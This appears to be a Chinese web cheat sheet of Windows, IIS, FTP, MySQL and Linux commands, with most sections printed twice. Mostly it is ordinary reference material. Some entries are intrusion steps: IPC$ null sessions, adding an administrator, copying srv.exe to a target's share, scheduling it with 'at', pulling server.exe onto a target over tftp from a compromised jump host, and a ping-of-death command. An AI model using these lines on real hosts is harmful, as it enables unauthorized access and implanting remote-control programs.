DOS命令全集
DOS
命令字典
..
收藏
net use \\ip\ipc$ " " /user:" " 建立 IPC 空链接
net use \\ip\ipc$ " 密码 " /user:" 用户名 " 建立 IPC 非空链接
net use h: \\ip\c$ " 密码 " /user:" 用户名 " 直接登陆后映射对方 C :到本地为 H:
net use h: \\ip\c$ 登陆后映射对方 C :到本地为 H:
net use \\ip\ipc$ /del 删除 IPC 链接
net use h: /del 删除映射对方到本地的为 H: 的映射
net user 用户名 密码 /add 建立用户
net user guest /active:yes 激活 guest 用户
net user 查看有哪些用户
net user 帐户名 查看帐户的属性
net localgroup ***istrators 用户名 /add 把 “ 用户 ” 添加到管理员中使其具有管理员权限 , 注意: ***istrator 后加 s 用复数
net start 查看开启了哪些服务
net start 服务名 开启服务; ( 如 :net start telnet , net start schedule)
net stop 服务名 停止某服务
net time \\ 目标 ip 查看对方时间
net time \\ 目标 ip /set 设置本地计算机时间与 “ 目标 IP” 主机的时间同步 , 加上参数 /yes 可取消确认信息
net view 查看本地局域网内开启了哪些共享
net view \\ip 查看对方局域网内开启了哪些共享
net config 显示系统网络设置
net logoff 断开连接的共享
net pause 服务名 暂停某服务
net send ip " 文本信息 " 向对方发信息
net ver 局域网内正在使用的网络连接类型和信息
net share 查看本地开启的共享
net share ipc$ 开启 ipc$ 共享
net share ipc$ /del 删除 ipc$ 共享
net share c$ /del 删除 C :共享
net user guest 12345 用 guest 用户登陆后用将密码改为 12345
net password 密码 更改系统登陆密码
netstat -a 查看开启了哪些端口 , 常用 netstat -an
netstat -n 查看端口的网络连接情况,常用 netstat -an
netstat -v 查看正在进行的工作
netstat -p 协议名 例: netstat -p tcq/ip 查看某协议使用情况(查看 tcp/ip 协议使用情况)
netstat -s 查看正在使用的所有协议使用情况
nbtstat -A ip 对方 136 到 139 其中一个端口开了的话,就可查看对方最近登陆的用户名( 03 前的为用户名) - 注意:参数 -A 要大写
tracert - 参数 ip( 或计算机名 ) 跟踪路由(数据包),参数: “-w 数字 ” 用于设置超时间隔。
ping ip( 或域名 ) 向对方主机发送默认大小为 32 字节的数据,参数: “-l[ 空格 ] 数据包大小 ” ; “-n 发送数据次数 ” ; “-t” 指一直 ping 。
ping -t -l 65550 ip 死亡之 ping( 发送大于 64K 的文件并一直 ping 就成了死亡之 ping)
ipconfig (winipcfg) 用于 windows NT 及 XP(windows 95 98) 查看本地 ip 地址, ipconfig 可用参数 “/all” 显示全部配置信息
tlist -t 以树行列表显示进程 ( 为系统的附加工具,默认是没有安装的,在安装目录的 Support/tools 文件夹内 )
kill -F 进程名 加 -F 参数后强制结束某进程 ( 为系统的附加工具,默认是没有安装的,在安装目录的 Support/tools 文件夹内 )
del -F 文件名 加 -F 参数后就可删除只读文件 ,/AR 、 /AH 、 /AS 、 /AA 分别表示删除只读、隐藏、系统、存档文件, /A-R 、 /A-H 、 /A-S 、 /A-A 表示删除除只读、隐藏、系统、存档以外的文件。例如 “DEL/AR *.*” 表示删除当前目录下所有只读文件, “DEL/A-S *.*” 表示删除当前目录下除系统文件以外的所有文件
net use \\ip\ipc$ " " /user:" " 建立 IPC 空链接
net use \\ip\ipc$ " 密码 " /user:" 用户名 " 建立 IPC 非空链接
net use h: \\ip\c$ " 密码 " /user:" 用户名 " 直接登陆后映射对方 C :到本地为 H:
net use h: \\ip\c$ 登陆后映射对方 C :到本地为 H:
net use \\ip\ipc$ /del 删除 IPC 链接
net use h: /del 删除映射对方到本地的为 H: 的映射
net user 用户名 密码 /add 建立用户
net user guest /active:yes 激活 guest 用户
net user 查看有哪些用户
net user 帐户名 查看帐户的属性
net localgroup ***istrators 用户名 /add 把 “ 用户 ” 添加到管理员中使其具有管理员权限 , 注意: ***istrator 后加 s 用复数
net start 查看开启了哪些服务
net start 服务名 开启服务; ( 如 :net start telnet , net start schedule)
net stop 服务名 停止某服务
net time \\ 目标 ip 查看对方时间
net time \\ 目标 ip /set 设置本地计算机时间与 “ 目标 IP” 主机的时间同步 , 加上参数 /yes 可取消确认信息
net view 查看本地局域网内开启了哪些共享
net view \\ip 查看对方局域网内开启了哪些共享
net config 显示系统网络设置
net logoff 断开连接的共享
net pause 服务名 暂停某服务
net send ip " 文本信息 " 向对方发信息
net ver 局域网内正在使用的网络连接类型和信息
net share 查看本地开启的共享
net share ipc$ 开启 ipc$ 共享
net share ipc$ /del 删除 ipc$ 共享
net share c$ /del 删除 C :共享
net user guest 12345 用 guest 用户登陆后用将密码改为 12345
net password 密码 更改系统登陆密码
netstat -a 查看开启了哪些端口 , 常用 netstat -an
netstat -n 查看端口的网络连接情况,常用 netstat -an
netstat -v 查看正在进行的工作
netstat -p 协议名 例: netstat -p tcq/ip 查看某协议使用情况(查看 tcp/ip 协议使用情况)
netstat -s 查看正在使用的所有协议使用情况
nbtstat -A ip 对方 136 到 139 其中一个端口开了的话,就可查看对方最近登陆的用户名( 03 前的为用户名) - 注意:参数 -A 要大写
tracert - 参数 ip( 或计算机名 ) 跟踪路由(数据包),参数: “-w 数字 ” 用于设置超时间隔。
ping ip( 或域名 ) 向对方主机发送默认大小为 32 字节的数据,参数: “-l[ 空格 ] 数据包大小 ” ; “-n 发送数据次数 ” ; “-t” 指一直 ping 。
ping -t -l 65550 ip 死亡之 ping( 发送大于 64K 的文件并一直 ping 就成了死亡之 ping)
ipconfig (winipcfg) 用于 windows NT 及 XP(windows 95 98) 查看本地 ip 地址, ipconfig 可用参数 “/all” 显示全部配置信息
tlist -t 以树行列表显示进程 ( 为系统的附加工具,默认是没有安装的,在安装目录的 Support/tools 文件夹内 )
kill -F 进程名 加 -F 参数后强制结束某进程 ( 为系统的附加工具,默认是没有安装的,在安装目录的 Support/tools 文件夹内 )
del -F 文件名 加 -F 参数后就可删除只读文件 ,/AR 、 /AH 、 /AS 、 /AA 分别表示删除只读、隐藏、系统、存档文件, /A-R 、 /A-H 、 /A-S 、 /A-A 表示删除除只读、隐藏、系统、存档以外的文件。例如 “DEL/AR *.*” 表示删除当前目录下所有只读文件, “DEL/A-S *.*” 表示删除当前目录下除系统文件以外的所有文件
#2
二:
del /S /Q
目录
或用:
rmdir /s /Q
目录
/S
删除目录及目录下的所有子目录和文件。同时使用参数
/Q
可取消删除操作时的系统确认就直接删除。(二个命令作用相同)
move 盘符 \ 路径 \ 要移动的文件名 存放移动文件的路径 \ 移动后文件名 移动文件 , 用参数 /y 将取消确认移动目录存在相同文件的提示就直接覆盖
fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到 3st.txt 文件中, "> " 和 "> >" 是重定向命令
at id 号 开启已注册的某个计划任务
at /delete 停止所有计划任务,用参数 /yes 则不需要确认就直接停止
at id 号 /delete 停止某个已注册的计划任务
at 查看所有的计划任务
at \\ip time 程序 名 ( 或一个命令 ) /r 在某时间运行对方某 程序 并重新启动计算机
finger username @host 查看最近有哪些用户登陆
telnet ip 端口 远和登陆服务器 , 默认端口为 23
open ip 连接到 IP (属 telnet 登陆后的命令)
telnet 在本机上直接键入 telnet 将进入本机的 telnet
copy 路径 \ 文件名 1 路径 \ 文件名 2 /y 复制文件 1 到指定的目录为文件 2 ,用参数 /y 就同时取消确认你要改写一份现存目录文件
copy c:\srv.exe \\ip\***$ 复制本地 c:\srv.exe 到对方的 *** 下
cppy 1st.jpg/b+2st.txt/a 3st.jpg 将 2st.txt 的内容藏身到 1st.jpg 中生成 3st.jpg 新的文件,注: 2st.txt 文件头要空三排,参数: /b 指二进制文件, /a 指 ASCLL 格式文件
copy \\ip\***$\svv.exe c:\ 或 :copy\\ip\***$\*.* 复制对方 ***i$ 共享下的 srv.exe 文件(所有文件)至本地 C :
xcopy 要复制的文件或目录树 目标地址 \ 目录名 复制文件和目录树,用参数 /Y 将不提示覆盖相同文件
tftp -i 自己 IP( 用肉机作跳板时这用肉机 IP) get server.exe c:\server.exe 登陆后,将 “IP” 的 server.exe 下载到目标主机 c:\server.exe 参数: -i 指以二进制模式传送,如传送 exe 文件时用,如不加 -i 则以 ASCII 模式(传送文本文件模式)进行传送
tftp -i 对方 IP put c:\server.exe 登陆后,上传本地 c:\server.exe 至主机
ftp ip 端口 用于上传文件至服务器或进行文件操作,默认端口为 21 。 bin 指用二进制方式传送(可执行文件进);默认为 ASCII 格式传送 ( 文本文件时 )
route print 显示出 IP 路由,将主要显示网络地址 Network addres ,子网掩码 Netmask ,网关地址 Gateway addres ,接口地址 Interface
arp 查看和处理 ARP 缓存, ARP 是名字解析的意思,负责把一个 IP 解析成一个物理性的 MAC 地址。 arp -a 将显示出全部信息
start 程序 名或命令 /max 或 /min 新开一个新窗口并最大化(最小化)运行某 程序 或命令
mem 查看 cpu 使用情况
attrib 文件名 ( 目录名 ) 查看某文件(目录)的属性
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉 ( 添加 ) 某文件的 存档,只读,系统,隐藏 属性;用+则是添加为某属性
dir 查看文件,参数: /Q 显示文件及目录属系统哪个用户, /T:C 显示文件创建时间, /T:A 显示文件上次被访问时间, /T:W 上次被修改时间
date /t 、 time /t 使用此参数即 “DATE/T” 、 “TIME/T” 将只显示当前日期和时间,而不必输入新日期和时间
set 指定环境变量名称 = 要指派给变量的字符 设置环境变量
set 显示当前所有的环境变量
set p( 或其它字符 ) 显示出当前以字符 p( 或其它字符 ) 开头的所有环境变量
pause 暂停批处理 程序 ,并显示出:请按任意键继续 ....
if 在批处理 程序 中执行条件处理(更多说明见 if 命令及变量)
goto 标签 将 cmd.exe 导向到批处理 程序 中带标签的行(标签必须单独一行,且以冒号打头,例如: “ : start” 标签)
call 路径 \ 批处理文件名 从批处理 程序 中调用另一个批处理 程序 (更多说明见 call /? )
for 对一组文件中的每一个文件执行某个特定命令(更多说明见 for 命令及变量)
echo on 或 off 打开或关闭 echo ,仅用 echo 不加参数则显示当前 echo 设置
echo 信息 在屏幕上显示出信息
echo 信息 >> pass.txt 将 " 信息 " 保存到 pass.txt 文件中
findstr "Hello" aa.txt 在 aa.txt 文件中寻找字符串 hello
find 文件名 查找某文件
title 标题名字 更改 CMD 窗口标题名字
color 颜色值 设置 cmd 控制台前景和背景颜色; 0 =黑、 1 =蓝、 2 =绿、 3 =浅绿、 4 =红、 5 =紫、 6 =黄、 7= 白、 8= 灰、 9= 淡蓝、 A =淡绿、 B= 淡浅绿、 C= 淡红、 D= 淡紫、 E= 淡黄、 F= 亮白
prompt 名称 更改 cmd.exe 的显示的命令提示符 ( 把 C:\ 、 D:\ 统一改为: EntSky\ )
move 盘符 \ 路径 \ 要移动的文件名 存放移动文件的路径 \ 移动后文件名 移动文件 , 用参数 /y 将取消确认移动目录存在相同文件的提示就直接覆盖
fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到 3st.txt 文件中, "> " 和 "> >" 是重定向命令
at id 号 开启已注册的某个计划任务
at /delete 停止所有计划任务,用参数 /yes 则不需要确认就直接停止
at id 号 /delete 停止某个已注册的计划任务
at 查看所有的计划任务
at \\ip time 程序 名 ( 或一个命令 ) /r 在某时间运行对方某 程序 并重新启动计算机
finger username @host 查看最近有哪些用户登陆
telnet ip 端口 远和登陆服务器 , 默认端口为 23
open ip 连接到 IP (属 telnet 登陆后的命令)
telnet 在本机上直接键入 telnet 将进入本机的 telnet
copy 路径 \ 文件名 1 路径 \ 文件名 2 /y 复制文件 1 到指定的目录为文件 2 ,用参数 /y 就同时取消确认你要改写一份现存目录文件
copy c:\srv.exe \\ip\***$ 复制本地 c:\srv.exe 到对方的 *** 下
cppy 1st.jpg/b+2st.txt/a 3st.jpg 将 2st.txt 的内容藏身到 1st.jpg 中生成 3st.jpg 新的文件,注: 2st.txt 文件头要空三排,参数: /b 指二进制文件, /a 指 ASCLL 格式文件
copy \\ip\***$\svv.exe c:\ 或 :copy\\ip\***$\*.* 复制对方 ***i$ 共享下的 srv.exe 文件(所有文件)至本地 C :
xcopy 要复制的文件或目录树 目标地址 \ 目录名 复制文件和目录树,用参数 /Y 将不提示覆盖相同文件
tftp -i 自己 IP( 用肉机作跳板时这用肉机 IP) get server.exe c:\server.exe 登陆后,将 “IP” 的 server.exe 下载到目标主机 c:\server.exe 参数: -i 指以二进制模式传送,如传送 exe 文件时用,如不加 -i 则以 ASCII 模式(传送文本文件模式)进行传送
tftp -i 对方 IP put c:\server.exe 登陆后,上传本地 c:\server.exe 至主机
ftp ip 端口 用于上传文件至服务器或进行文件操作,默认端口为 21 。 bin 指用二进制方式传送(可执行文件进);默认为 ASCII 格式传送 ( 文本文件时 )
route print 显示出 IP 路由,将主要显示网络地址 Network addres ,子网掩码 Netmask ,网关地址 Gateway addres ,接口地址 Interface
arp 查看和处理 ARP 缓存, ARP 是名字解析的意思,负责把一个 IP 解析成一个物理性的 MAC 地址。 arp -a 将显示出全部信息
start 程序 名或命令 /max 或 /min 新开一个新窗口并最大化(最小化)运行某 程序 或命令
mem 查看 cpu 使用情况
attrib 文件名 ( 目录名 ) 查看某文件(目录)的属性
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉 ( 添加 ) 某文件的 存档,只读,系统,隐藏 属性;用+则是添加为某属性
dir 查看文件,参数: /Q 显示文件及目录属系统哪个用户, /T:C 显示文件创建时间, /T:A 显示文件上次被访问时间, /T:W 上次被修改时间
date /t 、 time /t 使用此参数即 “DATE/T” 、 “TIME/T” 将只显示当前日期和时间,而不必输入新日期和时间
set 指定环境变量名称 = 要指派给变量的字符 设置环境变量
set 显示当前所有的环境变量
set p( 或其它字符 ) 显示出当前以字符 p( 或其它字符 ) 开头的所有环境变量
pause 暂停批处理 程序 ,并显示出:请按任意键继续 ....
if 在批处理 程序 中执行条件处理(更多说明见 if 命令及变量)
goto 标签 将 cmd.exe 导向到批处理 程序 中带标签的行(标签必须单独一行,且以冒号打头,例如: “ : start” 标签)
call 路径 \ 批处理文件名 从批处理 程序 中调用另一个批处理 程序 (更多说明见 call /? )
for 对一组文件中的每一个文件执行某个特定命令(更多说明见 for 命令及变量)
echo on 或 off 打开或关闭 echo ,仅用 echo 不加参数则显示当前 echo 设置
echo 信息 在屏幕上显示出信息
echo 信息 >> pass.txt 将 " 信息 " 保存到 pass.txt 文件中
findstr "Hello" aa.txt 在 aa.txt 文件中寻找字符串 hello
find 文件名 查找某文件
title 标题名字 更改 CMD 窗口标题名字
color 颜色值 设置 cmd 控制台前景和背景颜色; 0 =黑、 1 =蓝、 2 =绿、 3 =浅绿、 4 =红、 5 =紫、 6 =黄、 7= 白、 8= 灰、 9= 淡蓝、 A =淡绿、 B= 淡浅绿、 C= 淡红、 D= 淡紫、 E= 淡黄、 F= 亮白
prompt 名称 更改 cmd.exe 的显示的命令提示符 ( 把 C:\ 、 D:\ 统一改为: EntSky\ )
#3
三:
ver
在
DOS
窗口下显示版本信息
winver 弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名)
format 盘符 /FS: 类型 格式化磁盘 , 类型 :FAT 、 FAT32 、 NTFS , 例: Format D: /FS:NTFS
md 目录名 创建目录
replace 源文件 要替换文件的目录 替换文件
ren 原文件名 新文件名 重命名文件名
tree 以树形结构显示出目录,用参数 -f 将列出第个文件夹中文件名称
type 文件名 显示文本文件的内容
more 文件名 逐屏显示输出文件
doskey 要锁定的命令=字符
doskey 要解锁命令 = 为 DOS 提供的锁定命令 ( 编辑命令行,重新调用 win2k 命令,并创建宏 ) 。如:锁定 dir 命令: doskey dir=entsky ( 不能用 doskey dir=dir) ;解锁: doskey dir=
taskmgr 调出任务管理器
chkdsk /F D: 检查磁盘 D 并显示状态报告;加参数 /f 并修复磁盘上的错误
tlntadmn telnt 服务 admn, 键入 tlntadmn 选择 3 ,再选择 8, 就可以更改 telnet 服务默认端口 23 为其它任何端口
exit 退出 cmd.exe程序 或目前,用参数 /B 则是退出当前批处理脚本而不是 cmd.exe
path 路径 \ 可执行文件的文件名 为可执行文件设置一个路径。
cmd 启动一个 win2K 命令解释窗口。参数: /eff 、 /en 关闭、开启命令扩展;更我详细说明见 cmd /?
regedit /s 注册表文件名 导入注册表;参数 /S 指安静模式导入,无任何提示;
regedit /e 注册表文件名 导出注册表
cacls 文件名 参数 显示或修改文件访问控制列表( ACL ) ―― 针对 NTFS 格式时。参数: /D 用户名 : 设定拒绝某用户访问; /P 用户名 :perm 替换指定用户的访问权限; /G 用户名 :perm 赋予指定用户访问权限; Perm 可以是 : N 无, R 读取, W 写入, C 更改 ( 写入 ) , F 完全控制;例: cacls D:\test.txt /D pub 设定 d:\test.txt 拒绝 pub 用户访问。
cacls 文件名 查看文件的访问用户权限列表
REM 文本内容 在批处理文件中添加注解
netsh 查看或更改本地网络配置情况
winver 弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名)
format 盘符 /FS: 类型 格式化磁盘 , 类型 :FAT 、 FAT32 、 NTFS , 例: Format D: /FS:NTFS
md 目录名 创建目录
replace 源文件 要替换文件的目录 替换文件
ren 原文件名 新文件名 重命名文件名
tree 以树形结构显示出目录,用参数 -f 将列出第个文件夹中文件名称
type 文件名 显示文本文件的内容
more 文件名 逐屏显示输出文件
doskey 要锁定的命令=字符
doskey 要解锁命令 = 为 DOS 提供的锁定命令 ( 编辑命令行,重新调用 win2k 命令,并创建宏 ) 。如:锁定 dir 命令: doskey dir=entsky ( 不能用 doskey dir=dir) ;解锁: doskey dir=
taskmgr 调出任务管理器
chkdsk /F D: 检查磁盘 D 并显示状态报告;加参数 /f 并修复磁盘上的错误
tlntadmn telnt 服务 admn, 键入 tlntadmn 选择 3 ,再选择 8, 就可以更改 telnet 服务默认端口 23 为其它任何端口
exit 退出 cmd.exe程序 或目前,用参数 /B 则是退出当前批处理脚本而不是 cmd.exe
path 路径 \ 可执行文件的文件名 为可执行文件设置一个路径。
cmd 启动一个 win2K 命令解释窗口。参数: /eff 、 /en 关闭、开启命令扩展;更我详细说明见 cmd /?
regedit /s 注册表文件名 导入注册表;参数 /S 指安静模式导入,无任何提示;
regedit /e 注册表文件名 导出注册表
cacls 文件名 参数 显示或修改文件访问控制列表( ACL ) ―― 针对 NTFS 格式时。参数: /D 用户名 : 设定拒绝某用户访问; /P 用户名 :perm 替换指定用户的访问权限; /G 用户名 :perm 赋予指定用户访问权限; Perm 可以是 : N 无, R 读取, W 写入, C 更改 ( 写入 ) , F 完全控制;例: cacls D:\test.txt /D pub 设定 d:\test.txt 拒绝 pub 用户访问。
cacls 文件名 查看文件的访问用户权限列表
REM 文本内容 在批处理文件中添加注解
netsh 查看或更改本地网络配置情况
#4
四:
IIS
服务命令:
iisreset /reboot 重启 win2k 计算机(但有提示系统将重启信息出现)
iisreset /start 或 stop 启动(停止)所有 Internet 服务
iisreset /restart 停止然后重新启动所有 Internet 服务
iisreset /status 显示所有 Internet 服务状态
iisreset /enable 或 disable 在本地系统上启用(禁用) Internet 服务的重新启动
iisreset /rebootonerror 当启动、停止或重新启动 Internet 服务时,若发生错误将重新开机
iisreset /noforce 若无法停止 Internet 服务,将不会强制终止 Internet 服务
iisreset /timeout Val 在到达逾时间(秒)时,仍未停止 Internet 服务,若指定 /rebootonerror 参数,则电脑将会重新开机。预设值为重新启动 20 秒,停止 60 秒,重新开机 0 秒。
FTP 命令: ( 后面有详细说明内容 )
ftp 的命令行格式为 :
ftp - v - d - i - n - g[ 主机名 ] - v 显示远程服务器的所有响应信息。
- d 使用调试方式。
- n 限制 ftp 的自动登录 , 即不使用 .netrc 文件。
- g 取消全局文件名。
help [ 命令 ] 或 ? [ 命令 ] 查看命令说明
bye 或 quit 终止主机 FTP 进程 , 并退出 FTP 管理方式 .
pwd 列出当前远端主机目录
put 或 send 本地文件名 [ 上传到主机上的文件名 ] 将本地一个文件传送至远端主机中
get 或 recv [ 远程主机文件名 ] [ 下载到本地后的文件名 ] 从远端主机中传送至本地主机中
mget [remote-files] 从远端主机接收一批文件至本地主机
mput local-files 将本地主机中一批文件传送至远端主机
dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件 . 如果有本地文件 , 就将结果写至本地文件
ascii 设定以 ASCII 方式传送文件 ( 缺省值 )
bin 或 image 设定以二进制方式传送文件
bell 每完成一次文件传送 , 报警提示
cdup 返回上一级目录
close 中断与远程服务器的 ftp 会话 ( 与 open 对应 )
open host[port] 建立指定 ftp 服务器连接 , 可指定连接端口
delete 删除远端主机中的文件
mdelete [remote-files] 删除一批文件
mkdir directory-name 在远端主机中建立目录
rename [from] [to] 改变远端主机中的文件名
rmdir directory-name 删除远端主机中的目录
status 显示当前 FTP 的状态
system 显示远端主机系统类型
user user-name [password] [account] 重新以别的用户名登录远端主机
open host [port] 重新建立一个新的连接
prompt 交互提示模式
macdef 定义宏命令
lcd 改变当前本地主机的工作目录 , 如果缺省 , 就转到当前用户的 HOME 目录
chmod 改变远端主机的文件权限
case 当为 ON 时 , 用 MGET 命令拷贝的文件名到本地机器中 , 全部转换为小写字母
cd remote - dir 进入远程主机目录
cdup 进入远程主机目录的父目录
! 在本地机中执行交互 shell , exit 回到 ftp 环境 , 如 !ls * .zip
iisreset /reboot 重启 win2k 计算机(但有提示系统将重启信息出现)
iisreset /start 或 stop 启动(停止)所有 Internet 服务
iisreset /restart 停止然后重新启动所有 Internet 服务
iisreset /status 显示所有 Internet 服务状态
iisreset /enable 或 disable 在本地系统上启用(禁用) Internet 服务的重新启动
iisreset /rebootonerror 当启动、停止或重新启动 Internet 服务时,若发生错误将重新开机
iisreset /noforce 若无法停止 Internet 服务,将不会强制终止 Internet 服务
iisreset /timeout Val 在到达逾时间(秒)时,仍未停止 Internet 服务,若指定 /rebootonerror 参数,则电脑将会重新开机。预设值为重新启动 20 秒,停止 60 秒,重新开机 0 秒。
FTP 命令: ( 后面有详细说明内容 )
ftp 的命令行格式为 :
ftp - v - d - i - n - g[ 主机名 ] - v 显示远程服务器的所有响应信息。
- d 使用调试方式。
- n 限制 ftp 的自动登录 , 即不使用 .netrc 文件。
- g 取消全局文件名。
help [ 命令 ] 或 ? [ 命令 ] 查看命令说明
bye 或 quit 终止主机 FTP 进程 , 并退出 FTP 管理方式 .
pwd 列出当前远端主机目录
put 或 send 本地文件名 [ 上传到主机上的文件名 ] 将本地一个文件传送至远端主机中
get 或 recv [ 远程主机文件名 ] [ 下载到本地后的文件名 ] 从远端主机中传送至本地主机中
mget [remote-files] 从远端主机接收一批文件至本地主机
mput local-files 将本地主机中一批文件传送至远端主机
dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件 . 如果有本地文件 , 就将结果写至本地文件
ascii 设定以 ASCII 方式传送文件 ( 缺省值 )
bin 或 image 设定以二进制方式传送文件
bell 每完成一次文件传送 , 报警提示
cdup 返回上一级目录
close 中断与远程服务器的 ftp 会话 ( 与 open 对应 )
open host[port] 建立指定 ftp 服务器连接 , 可指定连接端口
delete 删除远端主机中的文件
mdelete [remote-files] 删除一批文件
mkdir directory-name 在远端主机中建立目录
rename [from] [to] 改变远端主机中的文件名
rmdir directory-name 删除远端主机中的目录
status 显示当前 FTP 的状态
system 显示远端主机系统类型
user user-name [password] [account] 重新以别的用户名登录远端主机
open host [port] 重新建立一个新的连接
prompt 交互提示模式
macdef 定义宏命令
lcd 改变当前本地主机的工作目录 , 如果缺省 , 就转到当前用户的 HOME 目录
chmod 改变远端主机的文件权限
case 当为 ON 时 , 用 MGET 命令拷贝的文件名到本地机器中 , 全部转换为小写字母
cd remote - dir 进入远程主机目录
cdup 进入远程主机目录的父目录
! 在本地机中执行交互 shell , exit 回到 ftp 环境 , 如 !ls * .zip
#5
五:
MYSQL
命令:
mysql -h 主机地址 -u 用户名 - p 密码 连接 MYSQL; 如果刚安装好 MYSQL ,超级用户 root 是没有密码的。
(例: mysql -h110.110.110.110 -Uroot -P123456
注 :u 与 root 可以不用加空格,其它也一样)
exit 退出 MYSQL
mysql*** -u 用户名 -p 旧密码 password 新密码 修改密码
grant select on 数据库.* to 用户名 @ 登录主机 identified by \" 密码 \"; 增加新用户。(注意:和上面不同,下面的因为是 MYSQL 环境中的命令,所以后面都带一个分号作为命令结束符)
show databases; 显示 数据库 列表。刚开始时才两个 数据库 : mysql 和 test 。 mysql 库很重要它里面有 MYSQL 的系统信息,我们改密码和新增用户,实际上就是用这个库进行操作。
use mysql ;
show tables; 显示库中的数据表
describe 表名 ; 显示数据表的结构
create database 库名 ; 建库
use 库名;
create table 表名 ( 字段设定列表 ) ; 建表
drop database 库名 ;
drop table 表名; 删库和删表
delete from 表名 ; 将表中记录清空
select * from 表名 ; 显示表中的记录
mysqldump --opt school>school.bbb 备份 数据库 :(命令在 DOS 的 \\mysql\\bin 目录下执行) ; 注释 : 将 数据库school 备份到 school.bbb 文件, school.bbb 是一个文本文件,文件名任取,打开看看你会有新发现。
win2003 系统下新增命令(实用部份):
shutdown / 参数 关闭或重启本地或远程主机。
参数说明: /S 关闭主机, /R 重启主机, /T 数字 设定延时的时间,范围 0 ~ 180 秒之间, /A 取消开机, /M //IP 指定的远程主机。
例: shutdown /r /t 0 立即重启本地主机(无延时)
taskill / 参数 进程名或进程的 pid 终止一个或多个任务和进程。
参数说明: /PID 要终止进程的 pid, 可用 tasklist 命令获得各进程的 pid , /IM 要终止的进程的进程名, /F 强制终止进程, /T 终止指定的进程及他所启动的子进程。
tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符 (PID) 。
参数说明: /M 列出当前进程加载的 dll 文件, /SVC 显示出每个进程对应的服务,无参数时就只列出当前的进程。
mysql -h 主机地址 -u 用户名 - p 密码 连接 MYSQL; 如果刚安装好 MYSQL ,超级用户 root 是没有密码的。
(例: mysql -h110.110.110.110 -Uroot -P123456
注 :u 与 root 可以不用加空格,其它也一样)
exit 退出 MYSQL
mysql*** -u 用户名 -p 旧密码 password 新密码 修改密码
grant select on 数据库.* to 用户名 @ 登录主机 identified by \" 密码 \"; 增加新用户。(注意:和上面不同,下面的因为是 MYSQL 环境中的命令,所以后面都带一个分号作为命令结束符)
show databases; 显示 数据库 列表。刚开始时才两个 数据库 : mysql 和 test 。 mysql 库很重要它里面有 MYSQL 的系统信息,我们改密码和新增用户,实际上就是用这个库进行操作。
use mysql ;
show tables; 显示库中的数据表
describe 表名 ; 显示数据表的结构
create database 库名 ; 建库
use 库名;
create table 表名 ( 字段设定列表 ) ; 建表
drop database 库名 ;
drop table 表名; 删库和删表
delete from 表名 ; 将表中记录清空
select * from 表名 ; 显示表中的记录
mysqldump --opt school>school.bbb 备份 数据库 :(命令在 DOS 的 \\mysql\\bin 目录下执行) ; 注释 : 将 数据库school 备份到 school.bbb 文件, school.bbb 是一个文本文件,文件名任取,打开看看你会有新发现。
win2003 系统下新增命令(实用部份):
shutdown / 参数 关闭或重启本地或远程主机。
参数说明: /S 关闭主机, /R 重启主机, /T 数字 设定延时的时间,范围 0 ~ 180 秒之间, /A 取消开机, /M //IP 指定的远程主机。
例: shutdown /r /t 0 立即重启本地主机(无延时)
taskill / 参数 进程名或进程的 pid 终止一个或多个任务和进程。
参数说明: /PID 要终止进程的 pid, 可用 tasklist 命令获得各进程的 pid , /IM 要终止的进程的进程名, /F 强制终止进程, /T 终止指定的进程及他所启动的子进程。
tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符 (PID) 。
参数说明: /M 列出当前进程加载的 dll 文件, /SVC 显示出每个进程对应的服务,无参数时就只列出当前的进程。
#6
六:
Linux
系统下基本命令:
要区分大小写
uname 显示版本信息(同 win2K 的 ver )
dir 显示当前目录文件 ,ls -al 显示包括隐藏文件(同 win2K 的 dir )
pwd 查询当前所在的目录位置
cd cd .. 回到上一层目录,注意 cd 与 .. 之间有空格。 cd / 返回到根目录。
cat 文件名 查看文件内容
cat >abc.txt 往 abc.txt 文件中写上内容。
more 文件名 以一页一页的方式显示一个文本文件。
cp 复制文件
mv 移动文件
rm 文件名 删除文件, rm -a 目录名删除目录及子目录
mkdir 目录名 建立目录
rmdir 删除子目录,目录内没有文档。
chmod 设定档案或目录的存取权限
grep 在档案中查找字符串
diff 档案文件比较
find 档案搜寻
date 现在的日期、时间
who 查询目前和你使用同一台机器的人以及 Login 时间地点
w 查询目前上机者的详细资料
whoami 查看自己的帐号名称
groups 查看某人的 Group
passwd 更改密码
history 查看自己下过的命令
ps 显示进程状态
kill 停止某进程
gcc 黑客 通常用它来编译 C 语言写的文件
su 权限转换为指定使用者
telnet IP telnet 连接对方主机(同 win2K ),当出现 bash$ 时就说明连接成功。
ftp ftp 连接上某服务器(同 win2K )
uname 显示版本信息(同 win2K 的 ver )
dir 显示当前目录文件 ,ls -al 显示包括隐藏文件(同 win2K 的 dir )
pwd 查询当前所在的目录位置
cd cd .. 回到上一层目录,注意 cd 与 .. 之间有空格。 cd / 返回到根目录。
cat 文件名 查看文件内容
cat >abc.txt 往 abc.txt 文件中写上内容。
more 文件名 以一页一页的方式显示一个文本文件。
cp 复制文件
mv 移动文件
rm 文件名 删除文件, rm -a 目录名删除目录及子目录
mkdir 目录名 建立目录
rmdir 删除子目录,目录内没有文档。
chmod 设定档案或目录的存取权限
grep 在档案中查找字符串
diff 档案文件比较
find 档案搜寻
date 现在的日期、时间
who 查询目前和你使用同一台机器的人以及 Login 时间地点
w 查询目前上机者的详细资料
whoami 查看自己的帐号名称
groups 查看某人的 Group
passwd 更改密码
history 查看自己下过的命令
ps 显示进程状态
kill 停止某进程
gcc 黑客 通常用它来编译 C 语言写的文件
su 权限转换为指定使用者
telnet IP telnet 连接对方主机(同 win2K ),当出现 bash$ 时就说明连接成功。
ftp ftp 连接上某服务器(同 win2K )
附:批处理命令与变量
1
:
for
命令及变量
基本格式:
FOR / 参数 %variable IN (set) DO command [command_parameters] %variable: 指定一个单一字母可替换的参数,如: %i ,而指定一个变量则用: %%i ,而调用变量时用: %i% ,变量是区分大小写的( %i 不等于 %I )。
